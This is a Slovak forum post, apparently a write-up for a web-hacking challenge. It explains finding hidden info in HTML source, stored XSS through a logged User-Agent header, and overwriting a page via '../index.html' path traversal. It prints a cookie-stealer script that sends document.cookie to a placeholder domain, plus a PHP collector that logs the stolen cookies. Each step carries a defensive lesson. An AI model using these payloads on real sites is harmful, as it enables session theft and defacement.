hadanka c.5 - vysvetlenie
******* http://pc.poradna.net/question/view/66560-hadanka-c -5-obnov-stranku *******
ok, vidim ze este nie ste pripraveni na real web hacking a preto dalsia hadanka bude lahsia a bude z kategorie basic web hacking. budem sa tu snazit vysvetlit jednotlive kroky a ich dosah, ale rozhodol som sa, ze vam to nepoviem naraz(mam rad napatie). budem to vysvetlovat po jednotlivych krokoch(celkovo su 3) a s tyzdnovym odstupom, aby ste sa este samostatne mohli(aj ked neskoro) dostat do hall of fame.
1., najprv bolo treba najst dolezitu informaciu, kde je vlastne zaloha povodnych stranok. ta sa nachadzala v subore help.html(bolo treba pozriet do zdrojakov a odscrollovat ), na hlavnej stranke link - help.
- ponaucenie: aj ked nasi hackeri boli ocividne spicky, urobili jednu podstatnu chybu a to ze dolezite informacie ulozili do html zdrojakov, aj ked si mysleli ze ich nikto nenajde.
2., tu som chybu urobil ja. urobil som sice monitoring navstevnosti, ktory zabezpecoval script monitoring.php ale neuvedomil som si, ze aj informacie typu user_agent mozu byt zneuzite(user agent switcher(ff), proxomitron(proxy server)). tu mi utocnik vlozil cookie stealer a pri prihlaseni sa pod adminom a prezreti si monitoringu som o svoje cookie prisiel. mozny cookie stealer bol:
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
nejaky_cookie_citac.php mohol vyzerat takto:<?php
$cookie = $_GET['c'];
$fp = fopen('mycookies.html', 'a');
fwrite($fp, "$cookie\n<br>");
fclose($fp);
?>
-ponaucenie: pokial si na svojej stranke zaznamenavate aj informacie typu napr. user_agent, referrer, tak treba mysliet nato, ze aj toto je mozne zneuzit(nie len input z formulara alebo z url) a najlepsie je podla mna zmenit < a >
na znakove entity: < a >
, je s tym najmenej roboty. 3., a mame tu posledny bod. stacilo vojst do admin toolu, zadat meno a heslo, ktore sme adminovi ukradli a ako meno suboru uviest index.html a obsah spravy bol prave povodny html kod index.html v adresari _tmp_. bolo si vsak treba uvedomit ze sme v adresari _tmp_, preto ako meno sme pouzili: ../index.html(relativna cesta o uroven vyssie) alebo sme mohli pouzit absolutnu cestu: http://test.w3tech.sk/hadanky/5/index.html. akceptovana bola aj http://www.test.w3tech.sk/hadanky/5/index.html. tymto sme prepisali povodny index.html.
-ponaucenie: davajte si velkeho bacha, ak dovolite zapisovat sobory na vas web, aby tam nahodou niekto nezapisal vlastny php shell. :D